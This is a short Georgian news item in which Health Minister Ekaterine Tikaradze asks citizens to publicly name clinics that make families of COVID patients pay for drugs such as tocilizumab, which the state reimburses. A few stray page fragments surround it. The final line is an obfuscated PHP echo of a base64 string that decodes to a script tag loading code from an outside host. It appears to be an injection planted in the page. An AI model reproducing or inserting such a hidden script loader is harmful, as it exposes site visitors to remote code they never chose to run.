celsiusi
ავერსი შნაიდერი
ჯანდაცვის მინისტრი ეკატერინე ტიკარაძე მოქალაქეებს მოუწოდებს, იმ შემთხვევაში, თუ კლინიკა პაციენტის ოჯახს კოვიდპაციენტისთვის საჭირო მედიკამენტის ყიდვას მოსთხოვს, საჯაროდ განაცხადონ. ამის შესახებ მან ჟურნალისტებს განუცხადა.
 
„კოვიდპაციენტისთვის საჭირო ყველა მომსახურების და პრეპარტის ანაზღაურება სახელმწიფოს მხრიდან ფაქტობრივი ხარჯით ხდება. რაც ნიშნავს შემდეგს - ნებისმიერი ღირებულების წამალი, რაც შეიძლება პაციენტს დასჭირდეს სახელმწიფოს მხრიდანაა ანაზღაურებული. ყველას ძალიან დიდი თხოვნით მივმართვ - როცა ისინი აფიქსირებენ, რომ პაციენტის პატრონი მიდის, რათა 5 ათასი ლარი პრეპარატში გადაიხადოს, რომელიც კლინიკას უნდა შეეკვეთა, „ფეისბუკ“ პოსტში „დათაგონ“ ის კლინიკა, სადაც ეს ფაქტი მოხდა და რეგულირების სააგენტო მოახდენს რეაგირებას“, - განაცხადა ტიკარაძემ.
 
ცნობისთვის, რამდენიმე მოქალაქის ინფორაციით, კორონავირუსის საწინააღმდეგო პრეპარატ „ტოცილიზუმაბში“ კონკრეტულმა კლინიკამ ოჯახს თანხა გადაახდევინა.
1028
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");